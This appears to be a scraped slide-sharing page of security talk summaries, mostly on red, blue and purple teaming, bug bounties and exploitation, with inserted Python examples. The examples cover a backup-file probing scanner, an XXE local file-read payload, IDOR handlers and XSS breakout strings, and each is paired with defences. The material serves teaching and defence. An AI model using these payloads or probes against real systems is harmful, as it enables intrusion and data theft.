This was part of a 3-hour talk for students at a local college: an introduction to post-exploitation with PowerShell Empire. Feel free to use and learn from it.
The recent trend of using Attack and Defense together.
Due to the recent trend of using offensive and defensive capabilities together, we thought a talk on Purple Teaming would be interesting. We hope it benefits those on the attack side (red team), those on the defensive side (blue team), and those mixing the two.
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone (Sector 2016), Chris Gates & Haydn Johnson
Purple Teaming is conducting focused Red Teams with clear training objectives for the Blue Team for the ultimate goal of improving the organization’s overall security posture. The popular opinion is that Purple Teaming requires a big undertaking. This is not true and we will show practical exercises for Purple Teaming for varying levels of organizational maturity using the Cyber Kill Chain[1] as our framework.
Power your way to becoming a red team cyber security expert, ShivamSharma909
Red Teaming is the practice of rigorously challenging policies, plans, systems, and assumptions by taking the adversary's point of view. Red teams are typically independent of the organization they test and are engaged when a company decides to put its security controls and policies to the test.
https://infosec-train.blogspot.com/2021/08/power-your-way-to-becoming-red-team.html
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts: The Underrated Web-Danger
Testing and Exploiting Backup-File Artifacts with BFAC
BFAC Homepage: https://github.com/mazen160
Blog Post: http://blog.mazinahmed.net/2016/08/backup-file-artifacts.html
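The probing logic the talk describes, as an added example (not BFAC's own code): it derives the backup and temporary names that editors, deploy scripts and admins commonly leave beside a web resource, then asks the server for each one, trusting a 200 only when the body differs from the reply for a name that cannot exist (a soft-404 guard). The hostname target.example, the pattern list and the fake server are assumptions constructed for the demonstration; swap in a real HTTP client for the `fetch` callable on a live engagement.

```python
"""Backup-file artifact probing (added example, not BFAC's code): derive the
backup/temp names left beside a web resource, then ask the server for each.
HTTP is injected as a callable so the logic runs offline."""
import hashlib
import posixpath
import secrets
from typing import Callable, Dict, List, Tuple

Fetcher = Callable[[str], Tuple[int, bytes]]   # url -> (status, body)

# Assumed pattern list for the demo, not BFAC's own wordlist.
SUFFIXES = (".bak", ".old", ".orig", ".save", ".swp", ".tmp", ".copy", ".1", "~")


def backup_candidates(path: str) -> List[str]:
    """Candidate artifact paths for a URL path such as /admin/config.php."""
    directory, filename = posixpath.split(path)
    stem, ext = posixpath.splitext(filename)
    names = [filename + s for s in SUFFIXES]                    # config.php.bak, config.php~
    if ext:
        names += [stem + s for s in (".bak", ".old", ".orig")]  # config.bak (extension swapped)
    names += ["." + filename + ".swp", "#" + filename + "#"]    # vim swap file, emacs autosave
    seen, out = set(), []
    for name in names:
        if name not in seen:
            seen.add(name)
            out.append(posixpath.join(directory, name))
    return out


def probe(base_url: str, path: str, fetch: Fetcher) -> List[Tuple[str, int]]:
    """Return (path, size) for candidates the server serves as real files.
    A 200 only counts if its body differs from the reply for a random name that
    cannot exist; this filters out soft-404 pages that answer 200 for everything."""
    base = base_url.rstrip("/")
    _, baseline_body = fetch(base + path + "." + secrets.token_hex(8))
    baseline = hashlib.sha256(baseline_body).hexdigest()
    hits = []
    for cand in backup_candidates(path):
        status, body = fetch(base + cand)
        if status == 200 and hashlib.sha256(body).hexdigest() != baseline:
            hits.append((cand, len(body)))
    return hits


def make_fake_server(files: Dict[str, bytes], soft_404: bool = False) -> Fetcher:
    """Constructed stand-in for a target web server, used for offline runs."""
    def fetch(url: str) -> Tuple[int, bytes]:
        if url in files:
            return 200, files[url]
        if soft_404:
            return 200, b"<html><body>Page not found</body></html>"
        return 404, b"Not Found"
    return fetch


if __name__ == "__main__":
    # Constructed target: the live index.php is fine, but index.php.bak leaks source.
    server = make_fake_server({"http://target.example/index.php.bak": b"<?php $db_pass = 'hunter2';"})
    print(probe("http://target.example", "/index.php", server))
```

The baseline comparison is the check worth keeping on real targets: many frameworks answer every unknown path with a 200 and a friendly page, and a scanner that keys on status alone reports every candidate as a hit.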
The document discusses bug bounty hunting. It introduces Shubham Gupta and Yash Pandya who are security consultants and top bug hunters. It outlines the agenda which includes an introduction to bug bounty programs, reasons for bug hunting, how to find bugs, quick tips, proofs of concept, pros and cons, and a Q&A. It provides a brief history of bug bounty programs and notes that now anyone can participate from home. It discusses types of bugs and tools used for hunting. Quick tips include using Google dorks, testing for information disclosure vulnerabilities, and completing challenges to improve skills. Examples are provided of unique bugs found like SVG XSS and an IDOR issue found in Google.
Drupal, lessons learnt from real world security incidents, sydneydrupal
Dr. Pedram Hayati, Security Consultant at Security Dimension, covers best-practice recommendations for proactively hardening and securing Drupal, shares a few checks to detect whether your Drupal site has already been compromised, and walks through the steps to clean up a hacked website.
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016, Frans Rosén
Frans Rosén has reported hundreds of security issues using his big white hat since 2012. He has received the biggest bounty ever paid on HackerOne, and is one of the highest ranked bug bounty researchers of all time. He's been bug bounty hunting with an iPhone in Thailand, in a penthouse suite in Las Vegas and without even being present, using automation. He'll share his stories about how to act when a company's CISO is screaming "SH******T F*CK" in a phone call at 02:30 on a Friday night, what to do when companies are sending him money without any reason, and why Doctors without Borders are trying to hunt him down.
The document provides instructions on how to exploit XML external entity (XXE) vulnerabilities and become a more advanced "Jedi" level hacker. It begins with XML basics and progresses through external entity attacks, file reads, port scanning, denial of service attacks, and advanced techniques like out-of-band data exfiltration and pass-the-hash attacks. The document emphasizes moving beyond just direct output to more stealthy, no-output exploitation.
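As an added illustration of the file-read stage (not material from the deck), the following Python shows the payload shape and why the parser configuration decides the outcome: Python's stdlib SAX parser is run once with external general entities enabled, the XXE-prone setting, and once with them disabled, which has been the default since Python 3.7.1. The temp file, its contents and the `order` document are constructed for the demo.

```python
"""XXE file read against Python's stdlib SAX parser (added example).
The same document is parsed twice: with external general entities enabled
(vulnerable) and with them disabled (the default since Python 3.7.1)."""
import io
import tempfile
import xml.sax
from pathlib import Path
from typing import Tuple
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed attacker document: an external general entity pointing at a local
# file, referenced from element content so the parser inlines the file.
XXE_TEMPLATE = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE order [ <!ENTITY xxe SYSTEM "{file_url}"> ]>\n'
    "<order><item>&xxe;</item></order>"
)


class _CollectText(ContentHandler):
    """Gather character data, i.e. what the application would echo back."""
    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_order(xml_bytes: bytes, resolve_external: bool) -> str:
    """Parse the document and return the text the application sees.
    resolve_external=True is the configuration that makes XXE work."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    handler = _CollectText()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.parts)


def demo() -> Tuple[str, str]:
    """Plant a secret in a temp file, then parse the payload both ways.
    Returns (text with external entities enabled, text with them disabled)."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = Path(tmp) / "secret.txt"
        secret.write_text("db_password=hunter2")   # constructed secret
        payload = XXE_TEMPLATE.format(file_url=secret.as_uri()).encode()
        leaked = parse_order(payload, resolve_external=True)
        safe = parse_order(payload, resolve_external=False)
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("external entities on :", repr(leaked))
    print("external entities off:", repr(safe))
```

The "direct output" case the deck starts from is exactly `leaked`: the file is inlined into element text and reflected wherever the application displays `item`. When the response does not show the text, the same entity mechanism still fires, which is what the out-of-band techniques later in the deck build on.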
hackcon2013 - Dirty Little Secrets They Didn't Teach You In Pentesting Class v2, Chris Gates
This document discusses 10 different ways to execute code remotely on Windows systems, including native Windows tools like Sysinternals PSExec, methods in Metasploit like PSExec and PSExec-MOF, and other techniques like WMI, PowerShell, and RemCom. Each method is briefly outlined with its positives and negatives. For example, PSExec leaves the PSEXESVC service running but never needs updating, while Metasploit PSExec supports pass-the-hash but some antiviruses may flag the service binary. The document provides an overview of common remote code execution options for pentesters and their relative tradeoffs.
Smart Sheriff, Dumb Idea, the wild west of government assisted parenting, Abraham Aranguren
Would you want to let your kids discover the darker corners of the internet without protection? Wouldn't it be handy to know what they do online, to be alerted when they search for dangerous keywords and to be able to control what websites they can visit, and even when they play games?
Worry no longer, the South Korean government got you covered. Simply install the "Smart Sheriff" app on your and your kids' phones. Smart Sheriff is the first parental-control mobile app that has been made a legally required, obligatory install in an entire country! Yay, monitoring!
Well, something shady yet mandatory like this cannot go without an external pentest. And even better, one that wasn't solicited by the maintainer but initiated by the OTF and CitizenLab and executed by the Cure53 team! In this talk, two of the Cure53 testers involved in the first and, who would have guessed, second penetration test against the "Smart Sheriff" app will share what they found. Maybe all was fine with the app, maybe the million kids forced to have this run on their devices were all safe. Maybe. But would there be a talk about it then?
We all know, mandated surveillance apps to protect children are a great idea, and outsourcing to the lowest bidder, always delivers the best results. Right?
Going over the first and second pentest results we will share our impressions about the "security" of this ecosystem and show examples about the "comprehensive" vendor response, addressing "all" the findings impeccably. This talk is a great example of how security research about a serious political decision and mandate might achieve nothing at all - or show, how a simple pentest together with excellent activist work can maybe spark a political discussion and more.
Phishing for clicks is like the VA portion of a Pentest. It feels nice being a hacker, but that fuzzy feeling wears off quickly, once you learn about command and control.
Everyone knows in theory what phishing is and what phishing emails look like; they may even know, in theory, how it all works.
What about executing a Phishing campaign? This talk will show you the journey of setting up and executing a Phishing campaign to gain command and control. I have tried a few frameworks, coded some pages myself and will show the way I learned to Phish.
This is not just about sending an email and a link, this is about bypassing the email minefield to get the email to the target and having the payload call back out of the network.
We will go through:
Choosing and setting up a Phishing Framework
Cloning a site
Testing delivery and bypassing Spam filters with a payload (Click Once)
Testing different user interactions for executing payloads
Learning different payloads for command and control
Assessing the security posture of a web application is a common project for a penetration tester and a good skill for developers to know. In this talk, we'll go over the different stages of a web application pen test, from start to finish. We'll start with tools used during the discovery phase to utilize OSINT sources such as search engines, sub-domain brute-forcing and other methods to help you get a good idea of the target's "footprint", then automated scanners and their use, all the way to manual testing and tools used for fuzzing parameters to find potential SQL injection vulnerabilities. We'll also discuss pro tips and tricks that we use while conducting a full application penetration assessment. After this talk, you should have a good understanding of what is needed as well as where to start on your journey to hacking web apps.
Putting Rugged Into your DevOps Toolchain, James Wickett
This document discusses the need for "rugged" or hardened security solutions that can withstand adversity as part of a DevOps toolchain and culture. It outlines some past mistakes of the information security field in thinking risk assessment alone was sufficient, not integrating fully with development teams, and more. The document then introduces the Gauntlt tool, which allows security testing to be integrated into the development workflow using easy-to-read tests. Gauntlt helps security and development teams communicate better and adopt a culture of continuous integration and improvement. Example Gauntlt test files in different languages are provided.
This document discusses various free or low-cost security measures organizations can implement, including: using EMET to help prevent exploits; blocking Java user agents at the proxy to prevent Java-based exploits; implementing internal bug bounty programs; deploying port-forwarding honeypots; disabling WPAD; restricting internal DNS lookups; and using "evil canary" decoys to detect intruders. It also emphasizes the importance of monitoring for unusual traffic patterns and authentication events.
How to steal and modify data using Business Logic flaws - Insecure Direct Obj..., Frans Rosén
This document discusses insecure direct object references (IDOR), which occur when an application exposes a reference such as a file name or database key and performs no access-control check on it. An attacker can then read or modify other users' data simply by changing the reference. The document provides examples of IDOR vulnerabilities found in Twitter, Oculus, Square, Zapier, and WordPress. It emphasizes having a generic access control model, using unguessable identifiers rather than sequential numeric IDs, and thoroughly reviewing code to prevent IDOR issues.
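An added example, not code from the talk, of the flaw and the recommended fix in a small invoice handler: the vulnerable lookup trusts the id from the URL, while the hardened version routes every read and write through one ownership check (the "generic access control model") and publishes random tokens instead of database keys. The Invoice records, user ids and token values are constructed for the demonstration.

```python
"""IDOR (added example): a record lookup keyed on a client-supplied id with no
ownership check, beside a hardened version in which reads and writes share one
access-control gate scoped to the authenticated user."""
import secrets
from dataclasses import dataclass, replace
from typing import Dict, Optional


@dataclass(frozen=True)
class Invoice:
    id: int            # sequential database key
    owner_id: int
    public_id: str     # unguessable token used in URLs instead of the db key
    total_cents: int
    status: str = "open"


# Constructed sample data: customer 1 and customer 2 each own one invoice.
INVOICES: Dict[int, Invoice] = {
    1001: Invoice(1001, owner_id=1, public_id="inv_9f3c2a7e1b4d6c08", total_cents=12000),
    1002: Invoice(1002, owner_id=2, public_id="inv_0d8e4b6c5a2f7e13", total_cents=4550),
}
BY_PUBLIC_ID: Dict[str, Invoice] = {i.public_id: i for i in INVOICES.values()}


class Forbidden(Exception):
    """Raised for both 'no such record' and 'not your record' (no existence oracle)."""


# --- vulnerable: GET /invoices/<int:id> ------------------------------------
def get_invoice_vulnerable(session_user_id: int, invoice_id: int) -> Optional[Invoice]:
    # The session user is never consulted: changing 1001 to 1002 in the URL
    # returns another customer's invoice.
    return INVOICES.get(invoice_id)


# --- hardened: GET /invoices/<public_id>, POST /invoices/<public_id>/cancel ---
def _load_owned(session_user_id: int, public_id: str) -> Invoice:
    """Single access-control gate used by every handler that touches invoices."""
    inv = BY_PUBLIC_ID.get(public_id)
    if inv is None or inv.owner_id != session_user_id:
        raise Forbidden(public_id)
    return inv


def get_invoice_hardened(session_user_id: int, public_id: str) -> Invoice:
    return _load_owned(session_user_id, public_id)


def cancel_invoice_hardened(session_user_id: int, public_id: str) -> Invoice:
    """Writes go through the same gate, so the 'modify' half of IDOR is closed too."""
    inv = _load_owned(session_user_id, public_id)
    updated = replace(inv, status="cancelled")
    INVOICES[inv.id] = updated
    BY_PUBLIC_ID[public_id] = updated
    return updated


def new_public_id() -> str:
    """128-bit random token for new records: defence in depth against enumeration,
    not a substitute for the ownership check above."""
    return "inv_" + secrets.token_hex(16)


if __name__ == "__main__":
    print("user 1 reads invoice 1002 via vulnerable handler:", get_invoice_vulnerable(1, 1002))
    try:
        get_invoice_hardened(1, "inv_0d8e4b6c5a2f7e13")
    except Forbidden as e:
        print("hardened handler refused:", e)
```

Returning the same `Forbidden` for a missing record and for someone else's record matters: a distinct "not found" versus "not yours" response lets an attacker enumerate which identifiers exist even when the data itself is protected.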
How to do well in Bug bounty programs. Presentation at @nullhyd by Abhijeth, Abhijeth D
This presentation talks about how to do well in bug bounty programs. The slides explain a few best practices suggested by top bug hunters around the world.
For further details about the presentation/suggestions feel free to contact @abhijeth.
Drupal, WordPress, and Joomla are very popular Content Management Systems (CMSs) that have been widely adopted by government agencies, major businesses, social networks, and more, underscoring why understanding how these systems work and properly securing these applications is of the utmost importance. This talk focuses on the penetration tester's perspective of CMSs and dives into streamlining the assessment and remediation of commonly observed application and configuration flaws by way of custom exploit code and security checklists, all of which are open source and can be downloaded and implemented following the presentation.
In 2014, Filip managed to exceed our audience's expectations with a well-researched and energizing lecture. Since then, he's managed to build a successful tech startup and has worked for clients across the globe. We are very proud to present you one of the brightest minds on the Czech marketing scene!
Learn hints, tips and tricks from the Twitter Fabric development team, and the principles that guided their creation of this modular and powerful SDK.
Presentation delivered at DroidconNL, Amsterdam, Nov 2014
Thanks to Andrea Falcone and the Fabric team for content and materials. You can see a lightning version of this talk delivered at Twitter Flight here -> https://www.youtube.com/watch?v=3h7jQU1AOvw&index=2&list=PLFKjcMIU2WsjUiy7UcPiWNxktpin0WDgu
Rand Fishkin - The Invisible Giant that Mucks Up Our Marketing, Marketing Festival
This document discusses how cultural biases influence marketing decisions and strategies. It argues that common beliefs around gender biases, work hours, startup investments, and marketing channels are influenced by cultural conditioning rather than objective data. The document advocates investing in hard-to-measure marketing channels like word-of-mouth, SEO, and content marketing. It also suggests that search rankings are influenced more by solving user queries than links and keywords. Marketers are advised to consider new ranking factors and search features beyond traditional SEO techniques.
Nowadays REST APIs are behind every mobile app and nearly all web applications. As such, they bring a wide range of possibilities for communication and integration with a given system. But with great power comes great responsibility. This talk aims to provide general guidance related to API security assessment and covers common API vulnerabilities. We will look at an API interface from the perspective of a potential attacker.
I will show:
how to find hidden API interfaces
ways to detect available methods and parameters
fuzzing and pentesting techniques for API calls
typical problems
I will share several interesting cases from public bug bounty reports and personal experience, for example:
* how I got various credentials with one API call
* how to cause DoS by running Garbage Collector from API
This document provides an introduction to bug bounty programs. It defines what a bug bounty program is, provides a brief history of major programs, and discusses reasons they are beneficial for both security researchers and companies. Key points covered include popular programs like Google and Facebook, tools used in bug hunting like Burp Suite, and lessons for researchers such as writing quality reports and following each program's rules.
Ekoparty 2017 - The Bug Hunter's Methodology, bugcrowd
The document outlines a methodology for effectively finding security vulnerabilities in web applications through bug hunting. It covers discovery techniques like using search engines and subdomain enumeration tools. It then discusses mapping the application by directory brute forcing and vulnerability discovery. Specific vulnerability classes covered include XSS, SQLi, file uploads, LFI/RFI, and CSRF. The document provides resources for each vulnerability type and recommends tools that can help automate the testing process.
This document provides an introduction and overview of cross-site scripting (XSS) attacks. It discusses the impact of XSS, the different types (non-persistent, persistent, DOM-based), how XSS works by injecting client-side code through web requests, and includes demos. The document concludes with recommendations for preventing XSS, including validating and encoding input and output to avoid injecting malicious scripts.
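As an added example (not from the deck) of the encoding recommendation: the same untrusted string rendered into an HTML text node, an attribute value and a JavaScript string literal, once raw and once with the encoder each context needs, plus a small HTMLParser-based audit that shows which renderings a browser would treat as new tags or event handlers. The payload strings and the page template are constructed; `html.escape` on its own is not enough for the script context, which is the point the audit makes visible.

```python
"""Context-aware output encoding against XSS (added example). One untrusted
value lands in three contexts; each needs its own encoder."""
import html
import json
from html.parser import HTMLParser
from typing import List, Tuple

# Constructed probe strings, one per injection context.
PAYLOADS = [
    "<img src=x onerror=alert(1)>",            # breaks out of a text node
    '" onerror=alert(1) x="',                  # breaks out of an attribute value
    "</script><script>alert(1)</script>",      # breaks out of a script block
]


def render_unsafe(name: str) -> str:
    """Raw interpolation into three contexts (the bug)."""
    return (f"<p>Hello {name}</p>"
            f'<input value="{name}">'
            f'<script>var n = "{name}";</script>')


def js_string(value: str) -> str:
    """JSON-encode for a JS string literal, then escape the characters the HTML
    parser cares about so '</script>' inside the value cannot close the block."""
    return (json.dumps(value).replace("<", "\\u003c")
                             .replace(">", "\\u003e")
                             .replace("&", "\\u0026"))


def render_safe(name: str) -> str:
    """Each context gets the encoder it needs (the fix)."""
    text = html.escape(name, quote=False)   # text node: & < >
    attr = html.escape(name, quote=True)    # attribute value: also " and '
    return (f"<p>Hello {text}</p>"
            f'<input value="{attr}">'
            f"<script>var n = {js_string(name)};</script>")


class _Audit(HTMLParser):
    """Counts <script> start tags and on* attributes as a browser would see them."""
    def __init__(self):
        super().__init__()
        self.script_tags = 0
        self.event_handlers: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        self.event_handlers += [a for a, _ in attrs if a.startswith("on")]


def audit(markup: str) -> Tuple[int, List[str]]:
    """(number of script tags, injected event-handler attributes) for a page.
    The template legitimately contains exactly one <script>."""
    a = _Audit()
    a.feed(markup)
    a.close()
    return a.script_tags, a.event_handlers


if __name__ == "__main__":
    for p in PAYLOADS:
        print("unsafe:", audit(render_unsafe(p)), " safe:", audit(render_safe(p)))
```

The audit is a test aid, not a sanitizer: it tokenizes the rendered page the way a browser's HTML parser would, so an extra `<script>` start tag or an `onerror` attribute in its output means the payload changed the page structure rather than being displayed as text.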
Logs, Logs, Logs - What you need to know to catch a thief, Michael Gough
This will help you get started with Windows logging: what to enable, configure, gather and harvest to start catching hackers in their tracks.
The Windows Logging Cheat Sheet and the SEXY Six Event IDs you MUST monitor and alert on.
This talk was presented at BSidesLV 2016. It covered the trend of Automating Penetration Testing. We will delve into what this means for skilled penetration testers / exploit developers and the probable outcome of bigger and more breaches.
Co-speaker: Cheryl Biswas
Talk Description:
How about this: a blue team talk given by red teamers. But here’s our rationale - your best defence right now is a strategic offence. The rules of the game have changed and we need to get defence up to speed.
We’ll show you what the key elements are in a good defence strategy; what you can and need to be using to full advantage. We’ll talk about the new “buzzwords” and how they apply: visibility; patterns; big data. There’s a whole lotta data to wrangle, and you aren’t seeing the whole picture if you aren’t doing things right. Threat intel is about getting the big picture as it applies to you. You’ll learn the importance of context and prioritization so that you can manipulate intel feeds to do your bidding. And then we’ll take things further and talk about hunting the adversary, using an update on proven methodologies.
We’ll show you how to understand your data, correlate threats and pin point attacks. Attendees will leave with a new understanding of the resources they have on hand, and how to leverage those into an Adaptive Proactive Defense Strategy.
Average computer users are split into two teams, red and blue, to test their offensive and defensive cybersecurity skills. On the first day, the red team attacks the blue team's network by deploying beacons, exploits, and backdoors while taking down services, while the blue team focuses on understanding and hardening their network. On the second day, the roles are reversed and the blue team goes on the offensive to test the skills they learned from defending against attacks. The event provides benefits to both teams in sharpening their skills through hands-on experience.
Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe... - Denim Group
You’ve heard of black, white, and gray box testing? Adding to the security color spectrum, Red Teams (pen testers) working together with Blue Teams (defenders) can improve organizational security and get the most out of security assessments. This talk will discuss both general and specific concepts and techniques to improve penetration tests through coordination with internal security teams. We will discuss high level topics such as knowing what type of assessment is needed for your organization, through to more detailed technical concepts such as detecting attack traffic and coordinating with red team attacks. If your internal security team isn't ready for a pentest, let's discuss steps to get your team prepared and ready to fully take advantage of full scope penetration tests. From a pentester's perspective, we will discuss the types of testing that are most beneficial to your clients and how to communicate and perform testing activities in conjunction with blue teams. We will also talk about ways to assist the teams with remediation from a 3rd party point of view.
What are the three key points an audience will receive:
· Pen testing techniques on working with internal security
· Internal security techniques for detecting attacks
· Concepts on performing the best type of pen test for your customers
Going Purple: From full time breaker to part time fixer: 1 year later - Chris Gates
A little over a year ago I made the transition from external security consultant to internal offensive security engineer at Facebook. I went from a full time breaker to part time fixer. This talk is aimed at providing lessons learned and documenting the mindset changes I've made over the last year that I feel can be used by the industry as a whole. I've broken the lessons learned into three primary buckets; Red, Blue, and Purple and the talk will hopefully bring value to anyone working in their respective bucket or assist in their creation/continuing of purple teaming at their company.
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013 - beltface
1. The document discusses building a purple team program by combining knowledge from blue (security) and red (penetration testing) teams. It provides examples of threat modeling, tabletop exercises, and red team exercises performed for two clients.
2. The results and corrective actions from exercises on Client1 are discussed, such as installing Security Onion and Qualys. Building communication and getting management buy-in is advised to start a purple team program.
3. Resources like the Freenode IRC channels #misec and #ladosanostra are provided for learning attack paths and purple team strategies. Doing regular threat modeling, exercises, and assessments is presented as a proactive approach to security.
The document discusses building a home arcade system. It details three attempts using different hardware configurations - a Raspberry Pi, Windows laptop with Maximus Arcade emulator, and potentially a Windows PC with Hyperspin frontend. The Raspberry Pi setup had issues with exiting games without a keyboard. The Maximus Arcade setup on a laptop worked better out of the box but had video card issues. The goal is to build an easy-to-use system for kids to play retro games.
This is the slide deck from a presentation for SecTor 2016.
I spoke with Chris Gates @carnal0wnage.
The outline is:
DevOOPS: Attacks and Defenses for DevOps Toolchains - Chris Gates
DevOps toolchains are transforming modern IT, but hackers can undermine their benefits through poorly implemented or vulnerable DevOps tools. Chris Gates and Ken Johnson will share their collaborative attack research into the technology driving DevOps. They will share an attacker's perspective on exploiting DevOps organizations and the countermeasures these organizations should employ.
RSAC 2017
Ken Johnson & Chris Gates
The BlackBox Project: Safely store secrets in Git/Mercurial (originally for P... - Tom Limoncelli
A presentation given at PuppetCamp NYC 2014 about why Puppet users should stop storing secrets in Git/Hg and encrypt them instead. TLDR: It enables collaboration.
This talk is about why I believe having the ability to write tools and/or scripts can help elevate a Pen Testers game to the next level.
The talk is case study driven by the different scenarios I've encountered on assessments and the scripts or tools that have been developed as a result.
What Goes In Must Come Out: Egress-Assess and Data Exfiltration - CTruncer
This presentation documents how Egress-Assess can be used on assessments to simulate exfiltrating data over a variety of protocols.
Additionally, this presentation documents the addition of malware modules into Egress-Assess. The new malware modules allow users to emulate different pieces of malware families by using documented malware indicators.
This document provides instructions for accessing blocked websites like Facebook in college networks by using different methods to bypass firewalls and proxies. It explains how to use secure connections, proxy servers, the Tor network and VPNs to anonymously access blocked sites. It also describes setting up an SSH tunnel using PuTTY to create an encrypted tunnel for forwarding requests and browsing privately. Screenshots demonstrate successfully opening Facebook after configuring these techniques on the author's college network.
The document discusses reasons why PCs crash and methods for hacking Facebook accounts.
It provides 5 common reasons for PC crashes: 1) Hardware conflicts where two devices use the same interrupt request channel. 2) Bad RAM such as mismatched chip speeds or parity errors. 3) Improper BIOS settings. 4) Overheating components. 5) Hard drive failures from bad sectors or mechanical issues.
It also describes two methods for hacking Facebook accounts: 1) Using tabnapping to redirect users to a fake login page when they switch browser tabs. 2) Installing a keylogger file on a victim's computer to steal their login credentials. The document provides step-by-step instructions for both hacking methods.
Presented on November 4, 2016 at LASCON (https://lascon2016.sched.com/event/8W7h/honeypy-amp-honeydb). This talk will provide a light intro to honeypots and their benefits, and highlight two projects HoneyPy and HoneyDB. Operating honeypot sensors on your internal network is a simple way to make your network “noisy” and can trip up malicious actors that have already penetrated your network. Also, leveraging data from honeypot sensors on the Internet can be a useful source of threat information.
Tales from the fire station, or how Big Data works at Sigma Software - Денис Пишьєв, Sigma Software
This document provides advice for teams working on big data projects. It discusses the importance of knowing and trusting your team members, not over-relying on any single person, being aware of risks posed by the technical platform, learning your product inside and out, and securely handling credentials and access. Specific recommendations include listening to engineers, allowing flexibility in work, having backup plans, experimenting with default settings, monitoring data flows, and using information security best practices like separating code and credentials.
This document provides instructions for various computer-related tasks, some of which could enable harmful behavior. It discusses bypassing security measures, hiding and deleting drives, creating viruses, and cracking software, among other topics. The document warns users not to attempt certain instructions on their own computers due to risk of damage. It also contains links promoting harmful content.
The document discusses PowerShell Empire, a PowerShell post-exploitation framework that aims to provide a flexible and extensible platform for integrating offensive PowerShell capabilities. It provides an overview of Empire's architecture, including its client-server design with a backend database, listeners for command and control, and modules for additional functionality. The document demonstrates Empire's capabilities through modules for process injection, privilege escalation, credential dumping, and lateral movement. It also discusses considerations for detecting and analyzing Empire agents on compromised systems.
This document provides instructions for securely setting up communication tools like Tor and I2P for anonymous browsing and IRC chatting. It recommends installing Tor on Windows, Linux and MacOS, and also installing recommended Firefox add-ons like Adblock Plus and NoScript for increased privacy and security. Detailed steps are provided for installing I2P on Windows and Linux, configuring Firefox as a proxy for I2P, and connecting an IRC client to the I2P network for anonymous chat. The document also describes how to access I2P IRC from an Android device using the Irssi ConnectBot app.
GNUCITIZEN Pdp Owasp Day September 2007 - guest20ab09
The document discusses potential ways that Web 2.0 technologies could be abused by malicious actors, through five fictional stories. It describes how social networks, APIs, cloud services and other Web 2.0 features could enable new types of malware, spam, botnets and data theft. The stories illustrate techniques like using mashups and feeds to distribute malware, exploiting search and social media to spread worms, using bookmarks for ad-jacking and creating botnets, and abusing aggregators and search engines to conduct reconnaissance. The document warns that legitimate Web 2.0 services could enable large-scale abuse if exploited by attackers.
The document provides instructions for setting up a Python development environment on Ubuntu 14.04. It details installing Python, creating a virtual environment, setting up version control with Git and GitHub, and retrieving code from a GitHub repository to run locally. Key steps include opening a terminal, checking the Python version, installing virtualenv and virtualenvwrapper to create isolated environments, configuring Git, generating an SSH key for GitHub access, cloning a code repository from GitHub, and running the code.
Cracking Into Embedded Devices - HACK.LU 2K8 - guest441c58b71
The document discusses offensive techniques for compromising embedded devices, focusing on exploiting vulnerabilities in HTTP, UPnP, SNMP, and Wi-Fi to gain remote access. Many examples are provided of specific devices that were compromised through bugs like cross-site request forgery, privilege escalation flaws, and password leaks. The goal of the research is to show how embedded devices are easier to hack than general purpose systems and can be used as stepping stones into internal corporate networks.
This presentation was given to a group of SFS students at GW. It's designed to be semi-case study driven on the problems I've encountered on assessments and how programming can help solve them.
In these slides I have mentioned some hacking tricks which are interesting to know. You will be able to learn how sites are blocked and how to get rid of the blocks. You will also be able to crack passwords... And some useful tricks related to Facebook and mobile hacking. I hope you will like it... But one thing, the tricks are old... But what I think is, Old is Gold. :p
Building Encrypted APIs with HTTPS and Paillier - Nicholas Doiron
This document summarizes a presentation about building encrypted APIs with HTTPS and Paillier cryptography. It discusses how HTTPS encrypts web content and verifies website identities with certificates. It also describes tools like Let's Encrypt that can automate obtaining certificates to enable HTTPS on websites. The presentation discusses more advanced HTTPS security settings and explores homomorphic encryption and a crypto-geofence proof-of-concept project that uses partially homomorphic encryption without revealing sensitive location data.
This document provides information about the speaker, including their name, contact information, work experience, projects, and interests. They are a security researcher who previously worked as a VA and now works for HP Application Security Center. They enjoy talking about hacking and drinking beer and gin and tonics. The document also outlines an upcoming workshop they will be conducting on web hacking tools and techniques.
Ransomware - what is it, how to protect against it - Zoltan Balazs
This document provides biographical information about the author and discusses various topics related to ransomware, including notable ransomware families, encryption methods, prevention and recovery strategies. The author describes themselves as the creator of several hacking tools and concepts later adopted by cybercriminals. The document offers advice on ransomware prevention both for home and enterprise users, including tips on backups, application control, and making systems appear like a malware analyst's to avoid targeting.
Introduction to Just in Time Access - BrightTalk - Haydn Johnson
Ensuring users have access to only the resources they need, aka least privilege, is great. But have you considered granting users only the access they need?
This talk will introduce the concept of granting ‘Just-in-Time Access’. Securing an endpoint is more than patching and vulnerability management. Granting access to who, when and what also secures an endpoint. Only when a user needs to connect to a system, can access be granted. Ports such as SSH do not need to be open for the world to connect and probe. Database credentials do not need to last forever.
This approach limits the damage that can be caused by an account -- privileged or otherwise -- by reducing the amount of time an attacker has to gain access to the account, as well as the time they have to move from a compromised account before losing access.
The short explanation of Just-in-Time Access is providing short-term access in real time. It is a relatively new term in the industry and is another way to practice the least-privilege best practice.
Key Takeaways:
• The benefits to Just-in-Time access for security and operations
o Improved visibility
o Minimize damage from compromised accounts
o Operational efficiency
• How SSH can be replaced with AWS SSM sessions
o Direct SSH replacement
o SSH reverse proxy
• How Just in Time Access for database credentials can help
o Example: Hashicorp Vault
o Example: Akeyless
• Resources for learning more
Communication to the business is very different to exploitation. This talk helps bridge the gap between a finding and a business risk.
Presented at HackFest 2018
Human(e) Security in a World of Business 2018 - Haydn Johnson
Relationship Building in Security is extremely important.
Understand where I came from, where I am at, the struggles I had and the things I found that work to help improve the security posture of my organization.
